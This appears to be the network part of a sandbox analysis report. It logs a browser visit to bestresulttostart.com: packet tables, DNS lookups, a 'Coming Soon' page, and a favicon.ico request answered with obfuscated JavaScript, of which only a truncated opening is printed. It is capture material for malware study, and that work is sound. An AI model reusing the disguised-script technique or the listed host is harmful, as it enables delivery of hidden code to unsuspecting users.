            Apr 19, 2024 05:49:18.804852009 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804858923 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.804867983 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804889917 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.804915905 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.804955959 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.804960966 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.846797943 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:18.846807003 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:18.895322084 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:19.015343904 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:19.015609980 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:19.015666962 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:19.015675068 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:19.015853882 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:19.015907049 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:19.148067951 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.148109913 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.148241043 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.150024891 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.150047064 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.150752068 CEST49740443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:19.150773048 CEST44349740193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:19.380148888 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.432152987 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.459760904 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.459784985 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.463707924 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.463746071 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.463784933 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.465106010 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.465296984 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.520854950 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:19.520867109 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:19.566551924 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:20.403731108 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.403773069 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.404019117 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.406358004 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.406382084 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.627299070 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.627372026 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.631620884 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.631633997 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.632023096 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.674206018 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.690689087 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.732125998 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.827063084 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.827208042 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.827265978 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.963355064 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.963380098 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:20.963417053 CEST49743443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:20.963426113 CEST4434974323.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.124597073 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.124629974 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.125001907 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.125650883 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.125669956 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.252779007 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.252856016 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.252932072 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.253443956 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.253475904 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.347163916 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.347254038 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.348572016 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.348588943 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.349368095 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.351061106 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.396131992 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.554435015 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.554617882 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.554685116 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.555885077 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.555898905 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.555926085 CEST49744443192.168.2.423.63.206.91
            Apr 19, 2024 05:49:21.555931091 CEST4434974423.63.206.91192.168.2.4
            Apr 19, 2024 05:49:21.697428942 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.697767019 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.697803974 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.701471090 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.701554060 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.702198029 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.702373028 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.702416897 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.748142958 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.754071951 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:21.754091024 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:21.800945997 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.119693995 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.119827032 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.119918108 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.119942904 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.119971991 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.120026112 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.120040894 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.160316944 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.160335064 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.207184076 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.329535961 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.329722881 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.329812050 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.329885960 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.329891920 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.329916000 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.329957962 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.330182076 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:22.331231117 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.331528902 CEST49745443192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:22.331557989 CEST44349745193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:29.386051893 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:29.386120081 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:29.386254072 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:30.801218033 CEST49742443192.168.2.4172.253.124.104
            Apr 19, 2024 05:49:30.801250935 CEST44349742172.253.124.104192.168.2.4
            Apr 19, 2024 05:49:46.341901064 CEST8049736193.163.7.113192.168.2.4
            Apr 19, 2024 05:49:46.342015982 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:46.820012093 CEST4973680192.168.2.4193.163.7.113
            Apr 19, 2024 05:49:47.024395943 CEST8049736193.163.7.113192.168.2.4
            Apr 19, 2024 05:50:01.143237114 CEST4973580192.168.2.4193.163.7.113
            Apr 19, 2024 05:50:01.352631092 CEST8049735193.163.7.113192.168.2.4
            Apr 19, 2024 05:50:16.820142984 CEST4973580192.168.2.4193.163.7.113
            Apr 19, 2024 05:50:17.029603958 CEST8049735193.163.7.113192.168.2.4
            Apr 19, 2024 05:50:17.029660940 CEST4973580192.168.2.4193.163.7.113
            Apr 19, 2024 05:50:19.308377028 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:19.308427095 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.308605909 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:19.310699940 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:19.310713053 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.524597883 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.525269985 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:19.525288105 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.525728941 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.527661085 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:19.527734041 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:19.580982924 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:29.553318024 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:29.553391933 CEST44349754172.253.124.104192.168.2.4
            Apr 19, 2024 05:50:29.553683043 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:30.801505089 CEST49754443192.168.2.4172.253.124.104
            Apr 19, 2024 05:50:30.801527023 CEST44349754172.253.124.104192.168.2.4
            TimestampSource PortDest PortSource IPDest IP
            Apr 19, 2024 05:49:14.672385931 CEST53640891.1.1.1192.168.2.4
            Apr 19, 2024 05:49:14.689748049 CEST53492021.1.1.1192.168.2.4
            Apr 19, 2024 05:49:15.286851883 CEST53609251.1.1.1192.168.2.4
            Apr 19, 2024 05:49:15.610554934 CEST5560053192.168.2.41.1.1.1
            Apr 19, 2024 05:49:15.610840082 CEST6413253192.168.2.41.1.1.1
            Apr 19, 2024 05:49:15.929691076 CEST53641321.1.1.1192.168.2.4
            Apr 19, 2024 05:49:15.931041956 CEST53556001.1.1.1192.168.2.4
            Apr 19, 2024 05:49:16.344799042 CEST6058453192.168.2.41.1.1.1
            Apr 19, 2024 05:49:16.344902992 CEST6332353192.168.2.41.1.1.1
            Apr 19, 2024 05:49:16.656685114 CEST53605841.1.1.1192.168.2.4
            Apr 19, 2024 05:49:16.668757915 CEST53633231.1.1.1192.168.2.4
            Apr 19, 2024 05:49:18.872688055 CEST6086353192.168.2.41.1.1.1
            Apr 19, 2024 05:49:18.872862101 CEST6226053192.168.2.41.1.1.1
            Apr 19, 2024 05:49:18.976950884 CEST53608631.1.1.1192.168.2.4
            Apr 19, 2024 05:49:18.977607012 CEST53622601.1.1.1192.168.2.4
            Apr 19, 2024 05:49:21.110966921 CEST5049953192.168.2.41.1.1.1
            Apr 19, 2024 05:49:21.111625910 CEST6426253192.168.2.41.1.1.1
            Apr 19, 2024 05:49:21.216396093 CEST53504991.1.1.1192.168.2.4
            Apr 19, 2024 05:49:21.437309027 CEST53642621.1.1.1192.168.2.4
            Apr 19, 2024 05:49:27.462567091 CEST138138192.168.2.4192.168.2.255
            Apr 19, 2024 05:49:32.347059011 CEST53534401.1.1.1192.168.2.4
            Apr 19, 2024 05:49:51.312299013 CEST53613061.1.1.1192.168.2.4
            Apr 19, 2024 05:50:14.223016024 CEST53645181.1.1.1192.168.2.4
            Apr 19, 2024 05:50:14.311275005 CEST53573841.1.1.1192.168.2.4
            TimestampSource IPDest IPChecksumCodeType
            Apr 19, 2024 05:49:21.437402010 CEST192.168.2.41.1.1.1c214(Port unreachable)Destination Unreachable
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Apr 19, 2024 05:49:15.610554934 CEST192.168.2.41.1.1.10xf4aStandard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:15.610840082 CEST192.168.2.41.1.1.10xae27Standard query (0)bestresulttostart.com65IN (0x0001)false
            Apr 19, 2024 05:49:16.344799042 CEST192.168.2.41.1.1.10x8d76Standard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:16.344902992 CEST192.168.2.41.1.1.10x3238Standard query (0)bestresulttostart.com65IN (0x0001)false
            Apr 19, 2024 05:49:18.872688055 CEST192.168.2.41.1.1.10xb168Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.872862101 CEST192.168.2.41.1.1.10x68fStandard query (0)www.google.com65IN (0x0001)false
            Apr 19, 2024 05:49:21.110966921 CEST192.168.2.41.1.1.10xc6fcStandard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:21.111625910 CEST192.168.2.41.1.1.10xa13bStandard query (0)bestresulttostart.com65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Apr 19, 2024 05:49:15.931041956 CEST1.1.1.1192.168.2.40xf4aNo error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:16.656685114 CEST1.1.1.1192.168.2.40x8d76No error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.104A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.106A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.147A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.103A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.105A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.976950884 CEST1.1.1.1192.168.2.40xb168No error (0)www.google.com172.253.124.99A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:18.977607012 CEST1.1.1.1192.168.2.40x68fNo error (0)www.google.com65IN (0x0001)false
            Apr 19, 2024 05:49:21.216396093 CEST1.1.1.1192.168.2.40xc6fcNo error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:29.883780003 CEST1.1.1.1192.168.2.40xf1a7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Apr 19, 2024 05:49:29.883780003 CEST1.1.1.1192.168.2.40xf1a7No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
            Apr 19, 2024 05:49:42.091978073 CEST1.1.1.1192.168.2.40xdbc2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Apr 19, 2024 05:49:42.091978073 CEST1.1.1.1192.168.2.40xdbc2No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
            Apr 19, 2024 05:50:06.388976097 CEST1.1.1.1192.168.2.40x8555No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Apr 19, 2024 05:50:06.388976097 CEST1.1.1.1192.168.2.40x8555No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
            Apr 19, 2024 05:50:26.928334951 CEST1.1.1.1192.168.2.40x8e20No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Apr 19, 2024 05:50:26.928334951 CEST1.1.1.1192.168.2.40x8e20No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
            • bestresulttostart.com
            • https:
            • fs.microsoft.com
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449736193.163.7.113805724C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Apr 19, 2024 05:49:16.136811972 CEST436OUTGET / HTTP/1.1
            Host: bestresulttostart.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Apr 19, 2024 05:49:16.341054916 CEST360INHTTP/1.1 301 Moved Permanently
            Server: nginx
            Date: Fri, 19 Apr 2024 03:49:16 GMT
            Content-Type: text/html
            Content-Length: 162
            Connection: keep-alive
            Location: https://bestresulttostart.com/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449735193.163.7.113805724C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Apr 19, 2024 05:50:01.143237114 CEST6OUTData Raw: 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449737193.163.7.1134435724C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-04-19 03:49:17 UTC664OUTGET / HTTP/1.1
            Host: bestresulttostart.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-04-19 03:49:17 UTC339INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 19 Apr 2024 03:49:17 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 2569
            Connection: close
            Vary: Accept-Encoding
            Last-Modified: Mon, 08 Apr 2024 09:19:02 GMT
            ETag: "a09-615924bdc580c"
            Accept-Ranges: bytes
            Vary: Accept-Encoding
            Strict-Transport-Security: max-age=31536000;
            2024-04-19 03:49:17 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64
            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Coming Soon</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d
            2024-04-19 03:49:17 UTC1369INData Raw: 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 69 63 6f 6e 2d 6c 61 72 67 65 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 33 32 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74
            Data Ascii: fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;lett
            2024-04-19 03:49:17 UTC170INData Raw: 73 65 20 63 68 65 63 6b 20 62 61 63 6b 20 73 6f 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 3c 73 74 72 6f 6e 67 3e 44 6f 6d 61 69 6e 3a 3c 2f 73 74 72 6f 6e 67 3e 20 62 65 73 74 72 65 73 75 6c 74 74 6f 73 74 61 72 74 2e 63 6f 6d 3c 2f 73 65 63 74 69 6f 6e 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: se check back soon.</p><section class="footer"><strong>Domain:</strong> bestresulttostart.com</section></div></div></div></div></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449740193.163.7.1134435724C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-04-19 03:49:18 UTC598OUTGET /favicon.ico HTTP/1.1
            Host: bestresulttostart.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://bestresulttostart.com/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-04-19 03:49:18 UTC263INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 19 Apr 2024 03:49:18 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Vary: Accept-Encoding
            Strict-Transport-Security: max-age=31536000;
            2024-04-19 03:49:18 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
            Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
